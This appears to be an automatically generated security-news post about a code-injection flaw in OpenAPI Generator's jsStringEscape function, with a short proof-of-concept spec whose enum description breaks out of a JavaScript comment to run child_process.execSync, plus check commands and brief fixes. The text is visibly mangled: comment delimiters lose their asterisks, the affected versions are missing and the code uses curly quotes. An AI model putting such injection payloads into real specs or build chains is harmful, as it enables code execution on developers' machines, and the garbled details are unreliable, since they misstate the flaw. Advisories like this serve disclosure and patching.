Listen to this Post
This CVE exploits an incomplete sanitization fix in OpenAPI Generator’s `jsStringEscape` function. The function correctly escapes quotes but fails to sanitize asterisk () and forward slash (/) characters. When generating client-side JavaScript code from an OpenAPI specification, user-controllable data within enum descriptions is placed inside JavaScript comment blocks. An attacker can inject a `/` sequence to break out of the comment, followed by arbitrary JavaScript code. This malicious payload is then written directly into the generated output files, leading to Remote Code Execution when the generated code is executed.
Platform: OpenAPI Generator
Version: Affects versions
Vulnerability: Code Injection
Severity: Critical
Date: 2026-01-31
Prediction: 2026-02-14
What Undercode Say:
Analytics:
`grep -r “jsStringEscape” .`
`find . -name “.mustache” -exec grep -l “enum” {} \;`
`npm list -g openapi-generator-cli`
`openapi-generator-cli version`
How Exploit:
openapi: 3.0.4
info:
Exploit
components:
schemas:
Evil:
type: string
enum:
- PWNED
x-enumDescriptions:
- “pwned / }; require(‘child_process’).execSync(‘calc’); const a = { /”
Protection from this CVE:
Sanitize and /
Update generator version
Validate OpenAPI specs
Escape JS comment delimiters
Impact:
Remote Code Execution
Client-Side Compromise
Data Breach Potential
Build Chain Attack
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

